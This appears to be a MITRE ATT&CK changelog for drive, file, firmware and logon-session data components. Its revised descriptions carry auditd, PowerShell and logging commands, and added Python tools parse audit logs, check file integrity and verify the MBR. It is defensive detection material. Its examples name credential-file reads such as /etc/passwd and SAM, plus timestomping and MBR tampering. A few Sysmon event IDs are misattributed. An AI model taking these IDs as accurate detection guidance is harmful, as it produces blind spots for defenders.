- Network Drive Mapping: A network share `\\server\share` is mapped to the drive `Z:\`.
- Virtual Drive Creation: A virtual disk is mounted on `/mnt/virtualdrive` using an ISO image or a virtual hard disk (VHD).
- Cloud Storage Mounting: Google Drive is mounted as `G:\` on a Windows machine using a cloud sync tool.
- External Storage Integration: An external HDD or SSD is connected and assigned `/mnt/external` on a Linux system.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Logs the creation of a volume (mount or new drive letter assignment).
- Event ID 1006: Logs removable storage device insertions.
- Configuration: Enable "Removable Storage Events" in the Group Policy settings:
`Computer Configuration > Administrative Templates > System > Removable Storage Access`
Linux System Logs
- Command-Line Monitoring: Use `dmesg` or `journalctl` to monitor mount events.
- Auditd Configuration: Add audit rules to track mount points.
- Logs can be reviewed in /var/log/audit/audit.log.
macOS System Logs
- Unified Logs: Monitor system logs for mount activity:
- Command-Line Tools: Use `diskutil list` to verify newly created or mounted drives.
Endpoint Detection and Response (EDR) Tools
- EDR solutions can log removable drive usage and network-mounted drives. Configure EDR policies to alert on suspicious drive creation events.
SIEM Tools
- Centralize logs from multiple platforms into a SIEM (e.g., Splunk) to correlate and alert on suspicious drive creation activities. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:35.797Z |
description | Changes made to a drive letter or mount point of a data storage device | The alteration of a drive letter, mount point, or other attributes of a data storage device, which could involve reassignment, renaming, permissions changes, or other modifications. Examples:
- Drive Letter Reassignment: A USB drive previously assigned `E:\` is reassigned to `D:\` on a Windows machine.
- Mount Point Change: On a Linux system, a mounted storage device at `/mnt/external` is moved to `/mnt/storage`.
- Drive Permission Changes: A shared drive's permissions are modified to allow write access for unauthorized users or processes.
- Renaming of a Drive: A network drive labeled "HR_Share" is renamed to "Shared_Resources."
- Modification of Cloud-Integrated Drives: A cloud storage mount such as Google Drive is modified to sync only specific folders.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Indicates changes to a volume (e.g., drive letter reassignment).
- Event ID 1006: Logs permission modifications or changes to removable storage.
- Configuration: Enable "Storage Operational Logs" in the Event Viewer:
`Applications and Services Logs > Microsoft > Windows > Storage-Tiering > Operational`
Linux System Logs
- Auditd Configuration: Add audit rules to track changes to mounted drives: `auditctl -w /mnt/ -p w -k drive_modification`
- Command-Line Monitoring: Use `dmesg` or `journalctl` to observe drive modifications.
macOS System Logs
- Unified Logs: Collect mount or drive modification events: `log show --info | grep "Volume modified"`
- Command-Line Monitoring: Use `diskutil` to track changes:
Endpoint Detection and Response (EDR) Tools
- Configure policies in EDR solutions to monitor and log changes to drive configurations or attributes.
SIEM Tools
- Aggregate logs from multiple systems into a centralized platform like Splunk to correlate events and alert on suspicious drive modification activities. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:07.996Z |
description | Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) | To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples:
- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.
- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).
- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).
- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).
- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).
This data component can be collected through the following measures:
Windows
- Windows Event Logs: Event ID 4663: Captures file system auditing details, including who accessed the file, access type, and file name.
- Sysmon:
- Event ID 11: Logs file creation time changes.
- Event ID 1 (process creation): Can provide insight into files executed.
- PowerShell: Commands to monitor file access in real-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Monitor file access events using audit rules: `auditctl -w /path/to/file -p rwxa -k file_access`
- View logs: `ausearch -k file_access`
- Inotify: Use inotify to track file access on Linux: `inotifywait -m /path/to/watch -e access`
macOS
- Unified Logs: Monitor file access using the macOS Unified Logging System.
- FSEvents: File System Events can track file accesses: `fs_usage | grep open`
Network Devices
- SMB/CIFS Logs: Monitor file access over network shares using logs from SMB or CIFS protocol.
- NAS Logs: Collect logs from network-attached storage systems for file access events.
SIEM Integration
- Collect file access logs from all platforms (Windows, Linux, macOS) and centralize in a SIEM for correlation and analysis. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:18.072Z |
description | Initial construction of a new file (ex: Sysmon EID 11) | A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs).
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 11: Logs file creation events, capturing details like the file path, hash, and creation time.
- Windows Event Log: Enable "Object Access" auditing in Group Policy to track file creation under Event ID 4663.
- PowerShell: Real-time monitoring of file creation:`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Use audit rules to monitor file creation: `auditctl -w /path/to/directory -p w -k file_creation`
- View logs: `ausearch -k file_creation`
- Inotify: Monitor file creation with inotifywait: `inotifywait -m /path/to/watch -e create`
macOS
- Unified Logs: Use the macOS Unified Logging System to capture file creation events.
- FSEvents: Use File System Events to monitor file creation: `fs_usage | grep create`
Network Devices
- NAS Logs: Monitor file creation events on network-attached storage devices.
- SMB Logs: Collect logs of file creation activities over SMB/CIFS protocols.
SIEM Integration
- Forward logs from all platforms (Windows, Linux, macOS) to a SIEM for central analysis and alerting. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:10:21.434Z |
description | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) | Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 23: Logs file deletion events, including details such as file paths and responsible processes.
- Windows Event Log: Enable "Object Access" auditing to monitor file deletions.
- PowerShell: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -like '*DELETE*'}`
Linux
- Auditd: Use audit rules to capture file deletion events: `auditctl -a always,exit -F arch=b64 -S unlink -S rename -S rmdir -k file_deletion`
- Query logs: `ausearch -k file_deletion`
- Inotify: Use inotifywait to monitor file deletions: `inotifywait -m /path/to/watch -e delete`
macOS
- Endpoint Security Framework (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to capture file deletion activities.
- FSEvents: Track file deletion activities in real-time: `fs_usage | grep unlink`
SIEM Integration
- Forward file deletion logs to a SIEM for centralized monitoring and correlation with other events. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
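The Linux collection measures in the Drive Creation, Drive Modification, File Access and File Deletion entries above all rest on auditd rules tagged with `-k`, whose records land in `/var/log/audit/audit.log` and are queried with `ausearch -k <key>`. As an added example (not part of the ATT&CK changelog or of MITRE's data), here is a Python parser that groups raw audit records by event serial, resolves the numeric syscall, and classifies each event as file access, file deletion or drive (mount) modification. The sample log lines are constructed; the x86_64 syscall-number table is an assumed subset of the real one.

```python
import re
from collections import defaultdict

# x86_64 syscall numbers as they appear in raw audit.log records
# (`ausearch -i` would print the names). Assumed subset for this example.
SYSCALL_NAMES = {
    2: "open", 257: "openat", 59: "execve",
    87: "unlink", 263: "unlinkat", 84: "rmdir",
    82: "rename", 264: "renameat", 316: "renameat2",
    165: "mount", 166: "umount2",
}
DELETION_SYSCALLS = {"unlink", "unlinkat", "rmdir", "rename", "renameat", "renameat2"}
MOUNT_SYSCALLS = {"mount", "umount2"}

_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_SERIAL_RE = re.compile(r"msg=audit\((\d+)\.(\d+):(\d+)\)")

# Constructed sample: four events as auditd would record them under the keys
# used on this page (file_access, file_deletion, drive_modification).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713450000.101:101): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=900 pid=1234 auid=1000 uid=1000 gid=1000 euid=1000 comm="cat" exe="/usr/bin/cat" key="file_access"
type=CWD msg=audit(1713450000.101:101): cwd="/home/alice"
type=PATH msg=audit(1713450000.101:101): item=0 name="/etc/passwd" inode=131 dev=fd:01 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
type=SYSCALL msg=audit(1713450000.202:102): arch=c000003e syscall=263 success=yes exit=0 items=2 ppid=900 pid=1240 auid=1000 uid=0 gid=0 euid=0 comm="rm" exe="/usr/bin/rm" key="file_deletion"
type=PATH msg=audit(1713450000.202:102): item=0 name="/var/tmp/" inode=20 dev=fd:01 mode=040755 ouid=0 ogid=0 nametype=PARENT
type=PATH msg=audit(1713450000.202:102): item=1 name="/var/tmp/report.tmp" inode=4096 dev=fd:01 mode=0100600 ouid=0 ogid=0 nametype=DELETE
type=SYSCALL msg=audit(1713450000.303:103): arch=c000003e syscall=165 success=yes exit=0 items=1 ppid=900 pid=1250 auid=1000 uid=0 gid=0 euid=0 comm="mount" exe="/usr/bin/mount" key="drive_modification"
type=PATH msg=audit(1713450000.303:103): item=0 name="/mnt/external" inode=77 dev=fd:01 mode=040755 ouid=0 ogid=0 nametype=NORMAL
type=SYSCALL msg=audit(1713450000.404:104): arch=c000003e syscall=316 success=yes exit=0 items=4 ppid=900 pid=1260 auid=1000 uid=1000 gid=1000 euid=1000 comm="mv" exe="/usr/bin/mv" key="file_deletion"
type=PATH msg=audit(1713450000.404:104): item=2 name="/home/alice/notes.txt" inode=555 dev=fd:01 mode=0100644 ouid=1000 ogid=1000 nametype=DELETE
type=PATH msg=audit(1713450000.404:104): item=3 name="/home/alice/.cache/notes.txt" inode=555 dev=fd:01 mode=0100644 ouid=1000 ogid=1000 nametype=CREATE
"""


def parse_fields(line):
    """Turn one `key=value key="quoted value"` audit record into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _FIELD_RE.finditer(line)}


def group_records(text):
    """Group records by audit serial so the SYSCALL and PATH lines of one event stay together."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = _SERIAL_RE.search(line)
        if m:
            events[int(m.group(3))].append(parse_fields(line))
    return events


def summarize_event(records):
    """Collapse one event's records into a detection-friendly summary; None if it has no SYSCALL record."""
    sc = next((r for r in records if r.get("type") == "SYSCALL"), None)
    if sc is None:
        return None
    number = sc.get("syscall", "")
    name = SYSCALL_NAMES.get(int(number), f"syscall_{number}") if number.isdigit() else number
    paths = [r for r in records if r.get("type") == "PATH" and r.get("name") not in (None, "(null)")]
    # auditd marks the removed name of unlink*/rmdir and the source of rename* as DELETE,
    # so deletions are recognised even when the syscall table does not know the number.
    deleted = [p["name"] for p in paths if p.get("nametype") == "DELETE"]
    created = [p["name"] for p in paths if p.get("nametype") == "CREATE"]
    targets = [p["name"] for p in paths if p.get("nametype") != "PARENT"]
    if name in MOUNT_SYSCALLS:
        category = "drive_modification"
    elif deleted or name in DELETION_SYSCALLS:
        category = "file_deletion"
    else:
        category = "file_access"
    return {
        "category": category, "syscall": name,
        "success": sc.get("success") == "yes",
        "auid": sc.get("auid"), "uid": sc.get("uid"),
        "exe": sc.get("exe"), "comm": sc.get("comm"), "key": sc.get("key"),
        "targets": targets, "deleted": deleted, "created": created,
    }


def analyze_audit_log(text):
    """Per-event summaries in serial order, the same view `ausearch -k <key>` gives interactively."""
    return [s for _, recs in sorted(group_records(text).items())
            if (s := summarize_event(recs)) is not None]


if __name__ == "__main__":
    for ev in analyze_audit_log(SAMPLE_AUDIT_LOG):
        print(f'{ev["category"]:<18} {ev["syscall"]:<10} auid={ev["auid"]} uid={ev["uid"]} '
              f'{ev["comm"]} {ev["targets"]}')
```

Two details matter for anyone turning the rules on this page into alerts. First, `rm` and `mv` on current glibc call `unlinkat` and `renameat2`, so a rule that lists only `-S unlink -S rename -S rmdir` records nothing for them; the constructed sample assumes the rule also names `unlinkat` and `renameat2`, and the parser additionally keys on `nametype=DELETE` so it does not depend on the syscall table being complete. Second, `auid` (the login user) and `uid` (the effective user) are both kept because a deletion performed as root by a session that logged in as an ordinary user is exactly the kind of event the File Deletion entry wants surfaced.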
File: File Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-11-01T21:18:51.941Z | 2025-04-18T15:10:14.725Z |
description | Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. | contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples:
- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\Windows\System32\config\SAM on Windows.
- Timestamps: Analyzing the creation, modification, and access timestamps of a file.
- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.
- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.
- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.
- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.
This data component can be collected through the following measures:
Windows
- Sysinternals Tools: Use `AccessEnum` or `PSFile` to retrieve metadata about file access and permissions.
- Windows Event Logs: Enable object access auditing and monitor events like 4663 (Object Access) and 5140 (A network share object was accessed).
- PowerShell: Use Get-Item or Get-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Directory" -Recurse | Select-Object Name, Length, LastWriteTime, Attributes`
Linux
- File System Commands: Use `ls -l` or stat to retrieve file metadata: `stat /path/to/file`
- Auditd: Configure audit rules to log metadata access: `auditctl -w /path/to/file -p wa -k file_metadata`
- Filesystem Integrity Tools: Tools like tripwire or AIDE (Advanced Intrusion Detection Environment) can monitor file metadata changes.
macOS
- FSEvents: Use FSEvents to track file metadata changes.
- Endpoint Security Framework (ESF): Capture metadata-related events via ESF APIs.
- Command-Line Tools: Use ls -l or xattr for file attributes: `ls -l@ /path/to/file`
SIEM Integration
- Forward file metadata logs from endpoint or network devices to a SIEM for centralized analysis. |
x_mitre_version | 1.0 | 1.1 |
File: File Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:11.410Z |
description | Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) | Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples:
- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\System32\drivers\etc\hosts` on Windows.
- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.
- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.
- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.
- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.
This data component can be collected through the following measures:
Windows
- Event Logs: Enable file system auditing to monitor file modifications using Security Event ID 4670 (File System Audit) or Sysmon Event ID 2 (File creation time changed).
- PowerShell: Use Get-ItemProperty or Get-Acl cmdlets to monitor file properties: `Get-Item -Path "C:\path\to\file" | Select-Object Name, Attributes, LastWriteTime`
Linux
- File System Monitoring: Use tools like auditd with rules to monitor file modifications: `auditctl -w /path/to/file -p wa -k file_modification`
- Inotify: Use inotifywait to watch for real-time changes to files or directories: `inotifywait -m /path/to/file`
macOS
- Endpoint Security Framework (ESF): Monitor file modification events using ESF APIs.
- Audit Framework: Configure audit rules to track file changes.
- Command-Line Tools: Use fs_usage to monitor file activities: `fs_usage -w /path/to/file`
SIEM Tools
- Collect logs from endpoint agents (e.g., Sysmon, Auditd) and file servers to centralize file modification event data. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
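The File Metadata and File Modification entries above list content hashes, permission bits, owner and timestamps as the attributes worth collecting, and name AIDE and tripwire as tools that detect changes to them. As an added example (not ATT&CK's own data, and not code from AIDE or tripwire), here is a small Python baseline-and-compare check that records those attributes for every file under a directory and reports which kind of modification happened: content, permissions, owner, or a timestamp that moved while the bytes stayed the same. The scenario in `demo()` (file names and contents) is constructed, and Linux/POSIX permission semantics are assumed.

```python
import hashlib
import os
import stat
import tempfile


def sha256_of(path, chunk=65536):
    """Hash file content in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def file_metadata(path):
    """The subset of metadata an integrity check needs: hash, size, mode bits, owner, timestamps."""
    st = os.stat(path)
    return {
        "sha256": sha256_of(path),
        "size": st.st_size,
        "mode": stat.S_IMODE(st.st_mode),  # permission bits only, e.g. 0o644
        "uid": st.st_uid,
        "gid": st.st_gid,
        "mtime": st.st_mtime,
        "ctime": st.st_ctime,  # not settable with touch/utime, so worth keeping as a tamper indicator
    }


def snapshot(root):
    """Baseline every regular file under root, keyed by path relative to root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a real tool records link targets too; skipped here for brevity
            snap[os.path.relpath(full, root)] = file_metadata(full)
    return snap


def compare(before, after):
    """List (path, change) pairs describing what differs between two snapshots."""
    changes = []
    for rel in sorted(set(before) | set(after)):
        if rel not in before:
            changes.append((rel, "created"))
        elif rel not in after:
            changes.append((rel, "deleted"))
        else:
            old, new = before[rel], after[rel]
            if old["sha256"] != new["sha256"]:
                changes.append((rel, "content"))
            elif old["mtime"] != new["mtime"]:
                # same bytes, different mtime: the timestamp itself was changed (touch -d style)
                changes.append((rel, "timestamp"))
            if old["mode"] != new["mode"]:
                changes.append((rel, "permissions"))
            if (old["uid"], old["gid"]) != (new["uid"], new["gid"]):
                changes.append((rel, "owner"))
    return changes


def demo():
    """Constructed scenario: baseline a scratch directory, apply the kinds of changes the
    File Modification entry describes, and return what the comparison detects."""
    with tempfile.TemporaryDirectory() as root:
        files = {"config.ini": b"[server]\nport=22\n", "secrets.key": b"KEY", "report.txt": b"ok\n"}
        for name, content in files.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(content)
            os.chmod(os.path.join(root, name), 0o600)
        before = snapshot(root)

        with open(os.path.join(root, "config.ini"), "wb") as f:        # content change
            f.write(b"[server]\nport=2222\n")
        os.chmod(os.path.join(root, "secrets.key"), 0o644)             # permission change
        old = before["report.txt"]["mtime"] - 86400
        os.utime(os.path.join(root, "report.txt"), (old, old))         # timestamp manipulation
        with open(os.path.join(root, "dropped.bin"), "wb") as f:        # new file
            f.write(b"\x00")
        after = snapshot(root)
    return compare(before, after)


if __name__ == "__main__":
    for path, change in demo():
        print(f"{change:<12} {path}")
```

The timestamp rule is deliberately narrow: only an mtime that moved while the SHA-256 stayed identical is reported as a timestamp change, because a genuine content edit always moves mtime as well. In practice the baseline has to live somewhere the monitored host cannot rewrite (signed, or off-host), since a baseline that an intruder can regenerate after tampering detects nothing; that is also why the entry recommends forwarding these results to a SIEM.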
Firmware: Firmware Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:12:52.606Z |
description | Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) | Changes made to firmware, which may include its settings, configurations, or underlying data. This can encompass alterations to the Master Boot Record (MBR), Volume Boot Record (VBR), or other firmware components critical to system boot and functionality. Such modifications are often indicators of adversary activity, including malware persistence and system compromise. Examples:
- Changes to Master Boot Record (MBR): Modifying the MBR to load malicious code during the boot process.
- Changes to Volume Boot Record (VBR): Altering the VBR to redirect boot processes to malicious locations.
- Firmware Configuration Changes: Modifying BIOS/UEFI settings such as disabling Secure Boot.
- Firmware Image Tampering: Updating firmware with a malicious or unauthorized image.
- Logs or Errors Indicating Firmware Changes: Logs showing unauthorized firmware updates or checksum mismatches.
This data component can be collected through the following measures:
- BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to capture settings changes or firmware updates.
- Firmware Integrity Monitoring: Use tools or firmware security features to detect changes to firmware components.
- Endpoint Detection and Response (EDR) Solutions: Many EDR platforms can detect abnormal firmware activity, such as changes to MBR/VBR or unauthorized firmware updates.
- File System Monitoring: Monitor changes to MBR/VBR-related files using tools like Sysmon or auditd.
- Windows Example (Sysmon): Monitor Event ID 7 (Raw disk access).
- Linux Example (auditd): `auditctl -w /dev/sda -p wa -k firmware_modification`
- Network Traffic Analysis: Capture firmware updates downloaded over the network, particularly from untrusted sources. Use network monitoring tools like Zeek or Wireshark to analyze firmware-related traffic.
- Secure Boot Logs: Collect and analyze Secure Boot logs for signs of tampering or unauthorized configurations. Example: Use PowerShell to retrieve Secure Boot settings on Windows: `Confirm-SecureBootUEFI`
- Vendor-Specific Firmware Tools: Many hardware vendors provide tools for firmware integrity checks. Examples:
- Intel Platform Firmware Resilience (PFR).
- Lenovo UEFI diagnostics. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
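The MBR/VBR and firmware-integrity measures above say what to collect but not what the comparison looks like. As an added example that is not part of the ATT&CK description or of any vendor tool, the Python below splits a 512-byte MBR into its bootstrap code, partition table and boot signature, hashes the first two regions separately against a baseline, and reports which region changed, so a partition edit by a disk utility is not confused with replaced boot code. The sample sectors are constructed in the code; on a live Linux host the sector would be the first 512 bytes of the block device (root required), the same device the `auditctl -w /dev/sda` rule above watches. One caveat on the Sysmon entry: Sysmon records raw disk access as Event ID 9 (RawAccessRead), while Event ID 7 is ImageLoad.

```python
import hashlib
import struct

# Layout of a classic (non-GPT) Master Boot Record: the first 512 bytes of the disk.
BOOT_CODE = slice(0, 446)           # bootstrap code that the BIOS jumps into
PARTITION_TABLE = slice(446, 510)   # four 16-byte partition entries
SIGNATURE = slice(510, 512)         # boot signature, always 0x55 0xAA


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def mbr_baseline(sector: bytes) -> dict:
    """Hash the regions of a trusted MBR so later reads can be compared against it."""
    if len(sector) != 512:
        raise ValueError("an MBR is exactly 512 bytes")
    return {
        "boot_code": _sha256(sector[BOOT_CODE]),
        "partition_table": _sha256(sector[PARTITION_TABLE]),
    }


def check_mbr(sector: bytes, baseline: dict) -> dict:
    """Compare a freshly read MBR with the baseline and report per-region findings.

    Changed boot code or a broken signature raises an alert: legitimate software
    almost never rewrites the bootstrap code after installation. Partition-table
    changes are reported but not alerted on, since disk management tools make them.
    """
    if len(sector) != 512:
        raise ValueError("an MBR is exactly 512 bytes")
    findings = {
        "signature_ok": sector[SIGNATURE] == b"\x55\xaa",
        "boot_code_changed": _sha256(sector[BOOT_CODE]) != baseline["boot_code"],
        "partition_table_changed": _sha256(sector[PARTITION_TABLE]) != baseline["partition_table"],
    }
    findings["alert"] = findings["boot_code_changed"] or not findings["signature_ok"]
    return findings


def _constructed_mbr(boot_code: bytes) -> bytes:
    """Constructed sample sector: given boot code, one active Linux partition, valid signature."""
    code = boot_code.ljust(446, b"\x00")
    # status, CHS start, type (0x83 = Linux), CHS end, LBA start, sector count
    active = struct.pack("<B3sB3sII", 0x80, b"\x00\x02\x00", 0x83, b"\xfe\xff\xff", 2048, 1_000_000)
    table = active + b"\x00" * 48      # three empty entries
    return code + table + b"\x55\xaa"


# Constructed samples: a "trusted" sector and one whose bootstrap code was replaced.
TRUSTED_MBR = _constructed_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c")
TAMPERED_MBR = _constructed_mbr(b"\xeb\xfe" + b"\x90" * 6)


def demo() -> tuple:
    baseline = mbr_baseline(TRUSTED_MBR)
    return check_mbr(TRUSTED_MBR, baseline), check_mbr(TAMPERED_MBR, baseline)


if __name__ == "__main__":
    # On Linux the live sector would be read with open("/dev/sda", "rb").read(512) as root.
    for result in demo():
        print(result)
```

The baseline should be taken right after provisioning and stored off-host, otherwise an attacker who can rewrite the MBR can also rewrite the hashes it is compared against.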
Logon Session: Logon Session Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Old description:
Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)

New description:
The successful establishment of a new user session following a successful authentication attempt. This typically signifies that a user has provided valid credentials or authentication tokens, and the system has initiated a session associated with that user account. This data is crucial for tracking authentication events and identifying potential unauthorized access. Examples:
- Windows Systems
  - Event ID: 4624
    - Logon Type: 2 (Interactive) or 10 (Remote Interactive via RDP).
    - Account Name: JohnDoe
    - Source Network Address: 192.168.1.100
    - Authentication Package: NTLM
- Linux Systems
  - /var/log/utmp or /var/log/wtmp:
    - Log format: login user [tty] from [source_ip]
    - User: jane
    - IP: 10.0.0.5
    - Timestamp: 2024-12-28 08:30:00
- macOS Systems
  - /var/log/asl.log or unified logging framework:
    - Log: com.apple.securityd: Authentication succeeded for user 'admin'
- Cloud Environments
  - Azure Sign-In Logs:
    - Activity: Sign-in successful
    - Client App: Browser
    - Location: Unknown (Country: X)
  - Google Workspace
    - Activity: Login
    - Event Type: successful_login
    - Source IP: 203.0.113.55
This data component can be collected through the following measures:
- Windows Systems
  - Event Logs: Monitor Security Event Logs using Event ID 4624 for successful logons.
  - PowerShell Example: `Get-EventLog -LogName Security -InstanceId 4624`
- Linux Systems
  - Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/var/log/auth.log` for logon events.
  - Tools: Use `last` or `who` commands to parse login records.
- macOS Systems
  - Log Sources: Monitor `/var/log/asl.log` or Apple Unified Logs using the `log show` command.
  - Command Example: `log show --predicate 'eventMessage contains "Authentication succeeded"' --info`
- Cloud Environments
  - Azure AD: Use Azure Monitor to analyze sign-in logs. Example CLI Query: `az monitor log-analytics query -w <workspace_id> --analytics-query "AzureActivity | where ActivityStatus == 'Success' and OperationName == 'Sign-in'"`
  - Google Workspace: Enable and monitor Login Audit logs from the Admin Console.
  - Office 365: Use Audit Log Search in Microsoft 365 Security & Compliance Center for login-related events.
- Network Logs
  - Sources: Network authentication mechanisms (e.g., RADIUS or TACACS logs).
- Enable EDR Monitoring:
  - EDR tools monitor logon session activity, including the creation of new sessions.
  - Configure alerts for: Suspicious logon types (e.g., Logon Type 10 for RDP or Type 5 for Service). Logons from unusual locations, accounts, or devices.
  - Leverage EDR telemetry for session attributes like source IP, session duration, and originating process.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:18:20.802Z | 2025-04-18T15:12:26.544Z |
description | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | The successful establishment of a new user session following a successful authentication attempt. This typically signifies that a user has provided valid credentials or authentication tokens, and the system has initiated a session associated with that user account. This data is crucial for tracking authentication events and identifying potential unauthorized access. Examples:
- Windows Systems
- Event ID: 4624
- Logon Type: 2 (Interactive) or 10 (Remote Interactive via RDP).
